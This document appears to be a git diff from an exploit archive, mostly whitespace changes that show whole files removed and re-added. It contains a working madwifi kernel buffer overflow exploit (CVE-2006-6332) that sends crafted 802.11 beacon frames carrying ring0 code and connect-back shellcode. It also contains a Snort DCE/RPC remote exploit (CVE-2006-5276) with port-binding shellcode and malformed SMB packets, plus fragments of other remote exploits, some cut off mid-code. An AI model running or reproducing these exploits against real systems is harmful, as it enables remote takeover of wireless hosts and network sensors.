- * ......... - * 15fc3: 8d 54 24 12 lea 0xa(%esp),%edx <-esp+[10] - * 15fc7: 89 d7 mov %edx,%edi - * ... - * ... - * 15fd5: f3 a5 rep movsl %ds:(%esi),%es:(%edi) - * - * - * this is not a rule, check gcc generated code to calculate correct pad value : - * [startbuf-ret] = (16 + 188 - 10) = 194 byte - * PAD = 194 - SHELLCODE_SPACE - IEWPAheader(code,len,oui) = 194 - 150 - 8 = 36 - * ( -g 36 would be the choice in that case) - * - * NOTE: 1) the remote box must call the ioctl() SIOCGIWSCAN - * for ex. when the iface gets up or during iwlist iface scanning - * command - * - * 2) if you need more space for kernel mode code you can rely on - * struct ieee80211_scan_entry paramter of gwiscan_cb() - * function to access the real frame (a trivial joke) - * - * 3) i had no time to test this exploit on other boxes..: - * tested only on: Slackware 10 - madwifi 0.9.2 - * Kubuntu - kernel 2.6.17 - madwifi 0.9.2 - * - * - * TNX TNX TNX twiz antifork.org - */ - - -#include -#include -#include -#include -#include -#include - -#include -#include -#include -#include - - -/* 2.6.17 VSYSCALL: for >= 2.6.18 without fixed-vsyscall entry use kernel hardcoded value */ -#define VSYSCALL_JMP_ESP_OFFSET 0xffffe777 -#define IE_ZERO 0x00000000 - -#define FIX_BYTE(base,offset,byte) *(((unsigned char*)base) + offset) = byte; -#define FIX_WORD(base,offset,word) *((unsigned short *)((unsigned char*)base + offset)) = word; -#define FIX_DWORD(base,offset,dword) *((unsigned int *)((unsigned char*)base + offset)) = dword; - -/* shellcode max buffer */ -/* 8 bytes used for lenght + oui */ -#define SHELLCODE_SPACE 150 -#define PAD_SPACE 36 - -#define PAYLOAD_SPACE (SHELLCODE_SPACE + pad_space + 4 + 2) -#define TOTAL_PACKET_LEN (sizeof(beacon_80211_wpa) -1 + PAYLOAD_SPACE) - -/* exp option */ -char *iface = NULL; /* needed */ -char *driver = NULL; /* needed */ -char *ip = NULL; /* needed */ -short port = 0; /* needed */ -unsigned int jmp_address = VSYSCALL_JMP_ESP_OFFSET; -unsigned int pad_space = 
PAD_SPACE; - - - -/* ----------------------------------- */ - -#define SUB_OFFSET_PATCH 8 -char ring0_code[]= - "\xe8\x00\x00\x00\x00" //call 8048359 - "\x5e" //pop %esi - "\x81\xee\x88\x00\x00\x00" //sub $0x88,%esi /* PATCH */ - "\x31\xc0" //xor %eax,%eax - "\xb0\x04" //mov $0x4,%al - "\x01\xc4" //add %eax,%esp - "\x83\x3c\x24\x73" //cmp $0x73,%esp - "\x75\xf8" //jne 8048364 - "\x83\x7c\x24\x0c\x7b" //cmpl $0x7b,0xc(%esp) - "\x75\xf1" //jne 8048364 - "\x29\xc4" //sub %eax,%esp - "\x8b\x7c\x24\x0c" //mov 0xc(%esp),%edi - "\x89\x3c\x24" //mov %edi,(%esp) - "\x31\xc9" //xor %ecx,%ecx - "\xb1\x5b" //mov $0x5b,%cl /* FIX */ - "\xf3\xa4" //rep movsb %ds:(%esi),%es:(%edi) - "\xcf"; //iret - - -/* connect back */ -#define IP_OFFSET 35 -#define PORT_OFFSET 44 -char u_code[] = -"\x31\xc0\x89\xc3\x40\x40\xcd\x80\x39\xc3\x74\x03\x31\xc0\x40\xcd\x80" /* fork */ -"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5d" -"\xbe" -"\xf5\xff\xff\xfe" // ~ip -"\xf7\xd6\x56\x66\xbd" -"\x69\x7a" // port -"\x0f\xcd\x09\xdd\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9" -"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68" -"\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf"; - - -/* 802.11header + WPA IE prolog */ -#define WPA_LEN_OFFSET 55 -#define CHANNEL 11 -char beacon_80211_wpa[] = -"\x80" // management frame / subtype beacon -"\x00" // flags -"\x00\x00" // duration -"\xFF\xFF\xFF\xFF\xFF\xFF" // destination addr -"\xCC\xCC\xCC\xCC\xCC\xCC" // src address -"\xCC\xCC\xCC\xCC\xCC\xCC" // bbsid -"\x00\x00" // seq -"\x00\x00\x00\x00\x00\x00\x00\x00" // timestamp -"\x64\x00" // interval -"\x01\x00" // caps -"\x00\x03\x41\x41\x41" // ssid Information Element -"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" // rates Information Element -"\x03\x01\x0B" // channel Information Element (11) -"\xdd\xc6" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */ -"\x00\x50\xf2\x01\x01\x00"; // oui + type + version (first 6 byte of len) - -#define 
JUMP_OFFSET_PATCH 1 -char jmp_back[]="\xeb\x00"; - -/* ----------------------------------- */ - - -void usage(char *prog) -{ - printf("[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\n", prog); -} - -unsigned char *build_frame() -{ - int i,j; - char *frame = malloc(TOTAL_PACKET_LEN); - char *ptr = frame; - - unsigned int hsb = sizeof(ring0_code)-1; - unsigned int lsb = SHELLCODE_SPACE - hsb; - printf("[*][low-kcode]: %d\n[*][high-ucode]: %d\n", - lsb, hsb); - - printf("[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\n", - sizeof(u_code)-1, sizeof(ring0_code)-1); - - /* fix jump */ - int b = -4 - pad_space - (sizeof(jmp_back)-1) - (sizeof(ring0_code)-1); - FIX_BYTE(jmp_back, JUMP_OFFSET_PATCH, b); - - /* fix ring0_code/u_code displacement */ - unsigned int sub = 5 + (sizeof(u_code)-1); - FIX_BYTE(ring0_code, SUB_OFFSET_PATCH, sub); - - printf("[*][payload space]: %d\n", PAYLOAD_SPACE); - - /* fix beacon_80211_wpa: WPA len */ - FIX_BYTE(beacon_80211_wpa, WPA_LEN_OFFSET, PAYLOAD_SPACE + 6); - printf("[*][beacon_WPA_IE_lenght]: %u\n", - (unsigned char)beacon_80211_wpa[WPA_LEN_OFFSET]); - - /* fill frame */ - memset(frame, 0x00, TOTAL_PACKET_LEN); - - memcpy(ptr, beacon_80211_wpa, sizeof(beacon_80211_wpa)-1); - ptr += (sizeof(beacon_80211_wpa)-1); - - memset(ptr, 0x90, lsb - (sizeof(u_code)-1)); - ptr += (lsb - (sizeof(u_code)-1)); - - memcpy(ptr, u_code, sizeof(u_code) -1); - ptr += (sizeof(u_code) -1); - - memcpy(ptr, ring0_code, sizeof(ring0_code)-1); - ptr += sizeof(ring0_code)-1; - - for(i=0; i antifork.org\n" - "-------------------- **** ------------------\n" - "[opt-ip]: %s\n[opt-port]: %d\n[opt-iface]: %s\n[opt-driver]: %s\n[opt-jump]: 0x%08x\n[pad]: %d\n" - "-------------------- **** ------------------\n\n", - ip, port, iface, driver, jmp_address, pad_space); - - unsigned char *frame = build_frame(); - print_frame(frame, TOTAL_PACKET_LEN); - - /* Use the command-line argument as the desired driver type */ - 
drivertype = tx80211_resolvecard(driver); - - /* Validate the driver name specified */ - if (drivertype == INJ_NODRIVER) - { - fprintf(stderr, "Driver name not recognized.\n"); - return -1; - } - - if (tx80211_init(&in_tx, iface, drivertype) < 0) { - fprintf(stderr, "Error initializing drive \"%s\".\n", argv[1]); - return -1; - } - - if ((tx80211_getcapabilities(&in_tx) & TX80211_CAP_CTRL) == 0) - { - fprintf(stderr, "Driver does not support transmitting control frames.\n"); - return -1; - } - - if (tx80211_setchannel(&in_tx, CHANNEL) < 0) - { - fprintf(stderr, "Error setting channel.\n"); - return 1; - } - - if (tx80211_open(&in_tx) < 0) - { - fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname); - return 1; - } - - /* Initialized in_packet with packet contents and length of the packet */ - in_packet.packet = frame; - in_packet.plen = TOTAL_PACKET_LEN; - - printf("[sending packets]: about 10 a second\n"); - - while(i < 10000) - { - /* Transmit the packet */ - if (tx80211_txpacket(&in_tx, &in_packet) < 0) - { - fprintf(stderr, "Unable to transmit packet.\n"); - perror("txpacket"); - return 1; - } - i++; - usleep(100000); - } - /* Close the socket after transmitting the packet */ - tx80211_close(&in_tx); - - return 0; -} - -// milw0rm.com [2007-03-01] +/* ---- madwifi WPA/RSN IE remote kernel buffer overflow ------ + * expoit code by: sgrakkyu antifork.org -- 10/1/2007 + * + * CVE: 2006-6332 (Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES) + * + * (for wpa) + * .... + * memcpy(buf, se->se_wpa_ie, se->se_wpa_ie[1] + 2) + * .... + * .... + * the function re-uses args in the stack before returning so we + * can't trash them overwriting. + * Different compiled module [ex. different version of gcc] may require + * a different pad value.. 
(see -g option) + * + * ex: + * on one terminal runs: nc -l -p 31337 + * phi:~/kexec/lorcon# gcc -g -o madwifi_exp madwifi_exp.c -lorcon + * phi:~/kexec/lorcon# wlanconfig ath1 create wlandev wifi0 wlanmode monitor + * phi:~/kexec/lorcon# ifconfig ath1 up + * phi:~/kexec/lorcon# ./madwifi_exp -i ath1 -d madwifing -a 10.0.0.1 -p 31337 + * [opt-ip]: 10.0.0.1 + * [opt-port]: 31337 + * [opt-iface]: ath1 + * [opt-driver]: madwifing + * [opt-jump]: 0xffffe777 + * [pad]: 36 + * + * [*][Low Avail Byte]: 103 + * [*][High Avail Byte]: 47 + * [*][u_code[] (high)size]: 91, [ring0_code[] (low)size]: 47 + * [*][ patching jump ]: [eba7] + * [*][Payload space]: 192 + * [*][beacon_frame-80211]=54 + * [*][beacon_WPA_IE_lenght]: 198 + * + * [printing frame - start] + * 80 00 00 00 ff ff ff ff ff ff cc cc cc cc cc cc + * cc cc cc cc cc cc 00 00 00 00 00 00 00 00 00 00 + * 64 00 01 00 00 03 41 41 41 01 08 82 84 8b 96 0c + * 18 30 48 03 01 0b dd c6 00 50 f2 01 01 00 90 90 + * 90 90 90 90 90 90 90 90 90 90 31 c0 89 c3 40 40 + * .... + * .... + * + * + * Tuning option: + * - depending on gcc version/optimization we have to change the padding of vector + * payload, take a look to the following disassembly of the module wlan.o compiled + * with gcc-4.0 (kernel compiled for i586): + * + * 00015a49 : + * 15a49: 55 push %ebp + * 15a4a: 57 push %edi + * 15a4b: 56 push %esi + * 15a4c: 53 push %ebx + * 15a4d: 81 ec c4 00 00 00 sub $0xbc,%esp <--16+188=[204] + * ......... + * ......... + * ......... + * 15fc3: 8d 54 24 12 lea 0xa(%esp),%edx <-esp+[10] + * 15fc7: 89 d7 mov %edx,%edi + * ... + * ... + * 15fd5: f3 a5 rep movsl %ds:(%esi),%es:(%edi) + * + * + * this is not a rule, check gcc generated code to calculate correct pad value : + * [startbuf-ret] = (16 + 188 - 10) = 194 byte + * PAD = 194 - SHELLCODE_SPACE - IEWPAheader(code,len,oui) = 194 - 150 - 8 = 36 + * ( -g 36 would be the choice in that case) + * + * NOTE: 1) the remote box must call the ioctl() SIOCGIWSCAN + * for ex. 
when the iface gets up or during iwlist iface scanning
+ * command
+ *
+ * 2) if you need more space for kernel mode code you can rely on
+ * struct ieee80211_scan_entry paramter of gwiscan_cb()
+ * function to access the real frame (a trivial joke)
+ *
+ * 3) i had no time to test this exploit on other boxes..:
+ * tested only on: Slackware 10 - madwifi 0.9.2
+ * Kubuntu - kernel 2.6.17 - madwifi 0.9.2
+ *
+ *
+ * TNX TNX TNX twiz antifork.org
+ */
+
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include
+#include
+#include
+#include
+
+
+/* 2.6.17 VSYSCALL: for >= 2.6.18 without fixed-vsyscall entry use kernel hardcoded value */
+#define VSYSCALL_JMP_ESP_OFFSET 0xffffe777
+#define IE_ZERO 0x00000000
+
+#define FIX_BYTE(base,offset,byte) *(((unsigned char*)base) + offset) = byte;
+#define FIX_WORD(base,offset,word) *((unsigned short *)((unsigned char*)base + offset)) = word;
+#define FIX_DWORD(base,offset,dword) *((unsigned int *)((unsigned char*)base + offset)) = dword;
+
+/* shellcode max buffer */
+/* 8 bytes used for lenght + oui */
+#define SHELLCODE_SPACE 150
+#define PAD_SPACE 36
+
+#define PAYLOAD_SPACE (SHELLCODE_SPACE + pad_space + 4 + 2)
+#define TOTAL_PACKET_LEN (sizeof(beacon_80211_wpa) -1 + PAYLOAD_SPACE)
+
+/* exp option */
+char *iface = NULL; /* needed */
+char *driver = NULL; /* needed */
+char *ip = NULL; /* needed */
+short port = 0; /* needed */
+unsigned int jmp_address = VSYSCALL_JMP_ESP_OFFSET;
+unsigned int pad_space = PAD_SPACE;
+
+
+
+/* ----------------------------------- */
+
+#define SUB_OFFSET_PATCH 8
+char ring0_code[]=
+ "\xe8\x00\x00\x00\x00" //call 8048359
+ "\x5e" //pop %esi
+ "\x81\xee\x88\x00\x00\x00" //sub $0x88,%esi /* PATCH */
+ "\x31\xc0" //xor %eax,%eax
+ "\xb0\x04" //mov $0x4,%al
+ "\x01\xc4" //add %eax,%esp
+ "\x83\x3c\x24\x73" //cmp $0x73,%esp
+ "\x75\xf8" //jne 8048364
+ "\x83\x7c\x24\x0c\x7b" //cmpl $0x7b,0xc(%esp)
+ "\x75\xf1" //jne 8048364
+ "\x29\xc4" //sub %eax,%esp
+ "\x8b\x7c\x24\x0c" //mov 0xc(%esp),%edi
+ "\x89\x3c\x24" //mov %edi,(%esp)
+ "\x31\xc9" //xor %ecx,%ecx
+ "\xb1\x5b" //mov $0x5b,%cl /* FIX */
+ "\xf3\xa4" //rep movsb %ds:(%esi),%es:(%edi)
+ "\xcf"; //iret
+
+
+/* connect back */
+#define IP_OFFSET 35
+#define PORT_OFFSET 44
+char u_code[] =
+"\x31\xc0\x89\xc3\x40\x40\xcd\x80\x39\xc3\x74\x03\x31\xc0\x40\xcd\x80" /* fork */
+"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5d"
+"\xbe"
+"\xf5\xff\xff\xfe" // ~ip
+"\xf7\xd6\x56\x66\xbd"
+"\x69\x7a" // port
+"\x0f\xcd\x09\xdd\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"
+"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68"
+"\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";
+
+
+/* 802.11header + WPA IE prolog */
+#define WPA_LEN_OFFSET 55
+#define CHANNEL 11
+char beacon_80211_wpa[] =
+"\x80" // management frame / subtype beacon
+"\x00" // flags
+"\x00\x00" // duration
+"\xFF\xFF\xFF\xFF\xFF\xFF" // destination addr
+"\xCC\xCC\xCC\xCC\xCC\xCC" // src address
+"\xCC\xCC\xCC\xCC\xCC\xCC" // bbsid
+"\x00\x00" // seq
+"\x00\x00\x00\x00\x00\x00\x00\x00" // timestamp
+"\x64\x00" // interval
+"\x01\x00" // caps
+"\x00\x03\x41\x41\x41" // ssid Information Element
+"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" // rates Information Element
+"\x03\x01\x0B" // channel Information Element (11)
+"\xdd\xc6" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */
+"\x00\x50\xf2\x01\x01\x00"; // oui + type + version (first 6 byte of len)
+
+#define JUMP_OFFSET_PATCH 1
+char jmp_back[]="\xeb\x00";
+
+/* ----------------------------------- */
+
+
+void usage(char *prog)
+{
+ printf("[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\n", prog);
+}
+
+unsigned char *build_frame()
+{
+ int i,j;
+ char *frame = malloc(TOTAL_PACKET_LEN);
+ char *ptr = frame;
+
+ unsigned int hsb = sizeof(ring0_code)-1;
+ unsigned int lsb = SHELLCODE_SPACE - hsb;
+ printf("[*][low-kcode]: %d\n[*][high-ucode]: %d\n",
+ lsb, hsb);
+
+ printf("[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\n",
+ sizeof(u_code)-1, sizeof(ring0_code)-1);
+
+ /* fix jump */
+ int b = -4 - pad_space - (sizeof(jmp_back)-1) - (sizeof(ring0_code)-1);
+ FIX_BYTE(jmp_back, JUMP_OFFSET_PATCH, b);
+
+ /* fix ring0_code/u_code displacement */
+ unsigned int sub = 5 + (sizeof(u_code)-1);
+ FIX_BYTE(ring0_code, SUB_OFFSET_PATCH, sub);
+
+ printf("[*][payload space]: %d\n", PAYLOAD_SPACE);
+
+ /* fix beacon_80211_wpa: WPA len */
+ FIX_BYTE(beacon_80211_wpa, WPA_LEN_OFFSET, PAYLOAD_SPACE + 6);
+ printf("[*][beacon_WPA_IE_lenght]: %u\n",
+ (unsigned char)beacon_80211_wpa[WPA_LEN_OFFSET]);
+
+ /* fill frame */
+ memset(frame, 0x00, TOTAL_PACKET_LEN);
+
+ memcpy(ptr, beacon_80211_wpa, sizeof(beacon_80211_wpa)-1);
+ ptr += (sizeof(beacon_80211_wpa)-1);
+
+ memset(ptr, 0x90, lsb - (sizeof(u_code)-1));
+ ptr += (lsb - (sizeof(u_code)-1));
+
+ memcpy(ptr, u_code, sizeof(u_code) -1);
+ ptr += (sizeof(u_code) -1);
+
+ memcpy(ptr, ring0_code, sizeof(ring0_code)-1);
+ ptr += sizeof(ring0_code)-1;
+
+ for(i=0; i antifork.org\n"
+ "-------------------- **** ------------------\n"
+ "[opt-ip]: %s\n[opt-port]: %d\n[opt-iface]: %s\n[opt-driver]: %s\n[opt-jump]: 0x%08x\n[pad]: %d\n"
+ "-------------------- **** ------------------\n\n",
+ ip, port, iface, driver, jmp_address, pad_space);
+
+ unsigned char *frame = build_frame();
+ print_frame(frame, TOTAL_PACKET_LEN);
+
+ /* Use the command-line argument as the desired driver type */
+ drivertype = tx80211_resolvecard(driver);
+
+ /* Validate the driver name specified */
+ if (drivertype == INJ_NODRIVER)
+ {
+ fprintf(stderr, "Driver name not recognized.\n");
+ return -1;
+ }
+
+ if (tx80211_init(&in_tx, iface, drivertype) < 0) {
+ fprintf(stderr, "Error initializing drive \"%s\".\n", argv[1]);
+ return -1;
+ }
+
+ if ((tx80211_getcapabilities(&in_tx) & TX80211_CAP_CTRL) == 0)
+ {
+ fprintf(stderr, "Driver does not support transmitting control frames.\n");
+ return -1;
+ }
+
+ if (tx80211_setchannel(&in_tx, CHANNEL) < 0)
+ {
+ fprintf(stderr, "Error setting channel.\n");
+ return 1;
+ }
+
+ if (tx80211_open(&in_tx) < 0)
+ {
+ fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname);
+ return 1;
+ }
+
+ /* Initialized in_packet with packet contents and length of the packet */
+ in_packet.packet = frame;
+ in_packet.plen = TOTAL_PACKET_LEN;
+
+ printf("[sending packets]: about 10 a second\n");
+
+ while(i < 10000)
+ {
+ /* Transmit the packet */
+ if (tx80211_txpacket(&in_tx, &in_packet) < 0)
+ {
+ fprintf(stderr, "Unable to transmit packet.\n");
+ perror("txpacket");
+ return 1;
+ }
+ i++;
+ usleep(100000);
+ }
+ /* Close the socket after transmitting the packet */
+ tx80211_close(&in_tx);
+
+ return 0;
+}
+
+// milw0rm.com [2007-03-01]
diff --git a/platforms/linux/remote/340.c b/platforms/linux/remote/340.c
index 2416bdf66..b9ef90cb5 100755
--- a/platforms/linux/remote/340.c
+++ b/platforms/linux/remote/340.c
@@ -127,6 +127,6 @@ perror("Error with connecting. \n");
 write(fd,buf,strlen(buf)+1);
 printf("hmm: \n");
 close(fd);
-}
-
-// milw0rm.com [1997-06-24]
+}
+
+// milw0rm.com [1997-06-24]
diff --git a/platforms/linux/remote/346.c b/platforms/linux/remote/346.c
index 5d4ea7fa9..3d238d68c 100755
--- a/platforms/linux/remote/346.c
+++ b/platforms/linux/remote/346.c
@@ -450,6 +450,6 @@ int main(int argc,char *argv[])
 sleep(30);
 return 42;
 }
-
-
-// milw0rm.com [2001-12-20]
+
+
+// milw0rm.com [2001-12-20]
diff --git a/platforms/linux/remote/347.c b/platforms/linux/remote/347.c
index 3d944f8f4..e86904662 100755
--- a/platforms/linux/remote/347.c
+++ b/platforms/linux/remote/347.c
@@ -801,6 +801,6 @@ echo "$retaddr, /* packet receive buffer + 0x90 */"
 echo "0x0182, 288 },"
 echo
-echo finished.
-
-// milw0rm.com [2002-05-14]
+echo finished.
+
+// milw0rm.com [2002-05-14]
diff --git a/platforms/linux/remote/348.c b/platforms/linux/remote/348.c
index e24ee8bdf..edc3f7167 100755
--- a/platforms/linux/remote/348.c
+++ b/platforms/linux/remote/348.c
@@ -1423,6 +1423,6 @@ sc_build_x86_lnx (unsigned char *target, size_t target_len,
 }
 return (tl_orig - target_len);
-}
-
-// milw0rm.com [2002-05-14]
+}
+
+// milw0rm.com [2002-05-14]
diff --git a/platforms/linux/remote/359.c b/platforms/linux/remote/359.c
index 83bc99118..2041fd95f 100755
--- a/platforms/linux/remote/359.c
+++ b/platforms/linux/remote/359.c
@@ -429,6 +429,6 @@ ret=ret-((TOP-sizeof(code))/4);
 }
 exit(0);
-}
-
-// milw0rm.com [2004-07-22]
+}
+
+// milw0rm.com [2004-07-22]
diff --git a/platforms/linux/remote/3609.py b/platforms/linux/remote/3609.py
index 2f4e234dd..54dc92a70 100755
--- a/platforms/linux/remote/3609.py
+++ b/platforms/linux/remote/3609.py
@@ -1,86 +1,86 @@
-#!/usr/bin/python
-#
-# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in
-# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.
-# This code was tested against snort-2.6.1 running on Red Hat Linux 8
-#
-# Author shall bear no responsibility for any screw ups caused by using this code
-# Winny Thomas :-)
-
-import os
-import sys
-import time
-from scapy import *
-
-# Linux portbind shellcode; Binds shell on TCP port 4444
-shellcode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
-shellcode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
-shellcode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
-shellcode += "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
-shellcode += "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
-shellcode += "\x89\xe1\xcd\x80"
-
-def ExploitSnort(target):
- # SMB packet borrowed from http://www.milw0rm.com/exploits/3391
- # NetBIOS Session Service
- smbreq = "\x00\x00\x02\xab"
-
- # SMB Header
- smbreq += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
- smbreq += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
- smbreq += "\x00\x08\x30\x00"
-
- # Tree Connect AndX Request
- smbreq += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
- smbreq += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
- smbreq += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
- smbreq += "\x3f\x3f\x3f\x3f\x3f\x00"
-
- # NT Create AndX Request
- smbreq += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
- smbreq += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- smbreq += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
- smbreq += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
- smbreq += "\x63\x00\x00\x00"
-
- # Write AndX Request #1
- smbreq += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
- smbreq += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
- smbreq += "\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00"
- smbreq += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
- smbreq += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
- smbreq += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
- smbreq += "\x2b\x10\x48\x60\x02\x00\x00\x00"
-
- # Write AndX Request #2
- smbreq += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
- smbreq += "\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee"
- smbreq += "\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44"
- smbreq += "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
- # The following address overwrites RET and points into our shellcode
- smbreq += struct.pack('' % sys.argv[0]
- sys.exit(-1)
-
- print '[+] Sending malformed SMB packet'
- ExploitSnort(target)
- print '[+] Connecting to remote shell in 3 seconds...'
- time.sleep(3)
- ConnectRemoteShell(target)
-
-# milw0rm.com [2007-03-30]
+#!/usr/bin/python
+#
+# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in
+# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.
+# This code was tested against snort-2.6.1 running on Red Hat Linux 8
+#
+# Author shall bear no responsibility for any screw ups caused by using this code
+# Winny Thomas :-)
+
+import os
+import sys
+import time
+from scapy import *
+
+# Linux portbind shellcode; Binds shell on TCP port 4444
+shellcode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
+shellcode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
+shellcode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
+shellcode += "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
+shellcode += "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
+shellcode += "\x89\xe1\xcd\x80"
+
+def ExploitSnort(target):
+ # SMB packet borrowed from http://www.milw0rm.com/exploits/3391
+ # NetBIOS Session Service
+ smbreq = "\x00\x00\x02\xab"
+
+ # SMB Header
+ smbreq += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
+ smbreq += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
+ smbreq += "\x00\x08\x30\x00"
+
+ # Tree Connect AndX Request
+ smbreq += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
+ smbreq += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
+ smbreq += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
+ smbreq += "\x3f\x3f\x3f\x3f\x3f\x00"
+
+ # NT Create AndX Request
+ smbreq += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
+ smbreq += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+ smbreq += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
+ smbreq += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
+ smbreq += "\x63\x00\x00\x00"
+
+ # Write AndX Request #1
+ smbreq += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
+ smbreq += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
+ smbreq += "\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00"
+ smbreq += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
+ smbreq += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
+ smbreq += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
+ smbreq += "\x2b\x10\x48\x60\x02\x00\x00\x00"
+
+ # Write AndX Request #2
+ smbreq += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
+ smbreq += "\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee"
+ smbreq += "\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44"
+ smbreq += "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
+ # The following address overwrites RET and points into our shellcode
+ smbreq += struct.pack('' % sys.argv[0]
+ sys.exit(-1)
+
+ print '[+] Sending malformed SMB packet'
+ ExploitSnort(target)
+ print '[+] Connecting to remote shell in 3 seconds...'
+ time.sleep(3)
+ ConnectRemoteShell(target)
+
+# milw0rm.com [2007-03-30]
diff --git a/platforms/linux/remote/3615.c b/platforms/linux/remote/3615.c
index e7ae431d5..2a6751e3e 100755
--- a/platforms/linux/remote/3615.c
+++ b/platforms/linux/remote/3615.c
@@ -1,301 +1,301 @@
-/* dproxy-v1.c
- *
- * Copyright (c) 2007 by
- *
